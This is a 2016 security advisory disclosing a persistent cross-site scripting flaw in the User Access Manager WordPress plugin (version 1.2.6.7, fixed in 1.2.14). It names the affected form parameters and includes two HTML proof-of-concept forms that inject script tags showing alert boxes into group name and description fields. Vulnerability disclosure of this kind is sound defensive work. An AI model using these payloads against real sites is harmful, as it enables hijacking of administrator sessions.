Advisory

Burak Kelebek, July 2016

Persistent Cross-Site Scripting vulnerability in User Access Manager WordPress Plugin

Abstract

A persistent Cross-Site Scripting vulnerability has been encountered in the User Access Manager WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing other Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker needs to have an Administrator account in the WordPress website.

OVE ID

OVE-20160712-0025

Tested versions

This issue was successfully tested on the User Access Manager WordPress Plugin version 1.2.6.7.

Fix

This issue is resolved in User Access Manager version 1.2.14.

Introduction

With the User Access Manager WordPress plugin it is possible to manage access to posts, pages and files. This plugin is useful if you need a member area or a private section at your blog or you want that other people can write at your blog but not everywhere.

Details

Persistent Cross-Site Scripting was found in admin panel 'manage' page of User Access Manager. Multiple parameters in POST uam_usergroup are affected due to insufficient output encoding. This issue allows an attacker to perform a wide variety of actions, such as stealing other Administrators' session tokens, or performing arbitrary actions on their behalf. In order to exploit this issue, the attacker needs to have an Administrator account in the WordPress website.
   

Proof of concept

<html>
   <body>
      <form action="http://<target>/wp-admin/admin.php?page=uam_usergroup" method="POST">
         <input type="hidden" name="uamInsertUpdateGroupNonce" value="8657bd2424" />
         <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=uam_usergroup" />
         <input type="hidden" name="action" value="addGroup" />
         <input type="hidden" name="userGroupName" value="as<script>alert(1)</script>" />
         <input type="hidden" name="userGroupDescription" value="asd" />
         <input type="hidden" name="ipRange" value="asd" />
         <input type="hidden" name="readAccess" value="group" />
         <input type="hidden" name="writeAccess" value="group" />
         <input type="hidden" name="submit" value="Add user group" />
         <input type="hidden" name="" value="" />
         <input type="submit" value="Submit" />
      </form>
   </body>
</html>

<html>
   <body>
      <form action="http://<target>/wp-admin/admin.php?page=uam_usergroup" method="POST">
         <input type="hidden" name="uamInsertUpdateGroupNonce" value="8657bd2424" />
         <input type="hidden" name="_wp_http_referer" value="/wp-admin/admin.php?page=uam_usergroup" />
         <input type="hidden" name="action" value="addGroup" />
         <input type="hidden" name="userGroupName" value="sad" />
         <input type="hidden" name="userGroupDescription" value="<script>alert(2)</script>" />
         <input type="hidden" name="ipRange" value="asd" />
         <input type="hidden" name="readAccess" value="group" />
         <input type="hidden" name="writeAccess" value="group" />
         <input type="hidden" name="submit" value="Add user group" />
         <input type="submit" value="Submit" />
      </form>
   </body>
</html>

Work with us →